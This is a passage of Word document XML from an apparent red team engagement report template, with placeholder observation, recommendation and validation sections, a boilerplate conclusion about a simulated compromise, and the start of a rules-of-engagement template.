      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0D362F6B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>RECOMMENDATION (OPTIONAL)</w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:anchor="recommendation-optional" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72C5E55F" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>details</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2CFD74FC" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>VALIDATION (OPTIONAL)</w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:anchor="validation-optional" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="127DAA9C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Validation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>details</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A06EBF3" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>OBSERVATION 2</w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:anchor="observation-2" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7696BBD7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>details</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0FB11CF9" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>RECOMMENDATION (OPTIONAL)</w:t>
      </w:r>
      <w:hyperlink r:id="rId64" w:anchor="recommendation-optional-1" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18B1254C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>details</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5EF087DC" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>VALIDATION (OPTIONAL)</w:t>
      </w:r>
      <w:hyperlink r:id="rId65" w:anchor="validation-optional-1" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C98E60D" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Validation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>details</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="20BE667A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CONCLUSION</w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:anchor="conclusion" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="436E236C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> performed a Red Team engagement at the request of [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>CLIENT NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ] to determine the full impact of a realistic threat. The [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> team identified several exploitable vulnerabilities that were leveraged to establish a foothold, escalate privileges, expand access across the domain, and move proprietary information out of the network. [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> assesses that an external threat can successfully compromise [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>CLIENT NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ] systems based on the path demonstrated during the assessment. No highly specialized exploits or tools were used or required to perform any of the actions described within this report. [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> used a publicly available attack framework for nearly all exploitation activities. The technical skill level required to conduct individual actions ranges from low to intermediate. The required technical capability and level of access that was achieved by chaining these vulnerabilities is a cause for concern. Critical exposures and observations include [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>observation</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>, [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>observation</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ], and [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>observation</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]. [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> operators demonstrated that an adversary with an organized phishing campaign could potentially compromise the [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>CLIENT NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] domain and remotely collect sensitive data or observe, disrupt or deny </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>business operations. Overall, the Red Team was able to accomplish threat objectives and it is our hope that the security posture of [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">CLIENT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> systems will be improved as a result of the efforts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707B62C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="052C1ACB" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6496901A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7DDAB1" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ROE TEMPLATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C56486" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RED TEAM RULES OF ENGAGEMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AE2F56" w14:textId="4776D6FD" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Company Name and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Logo</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
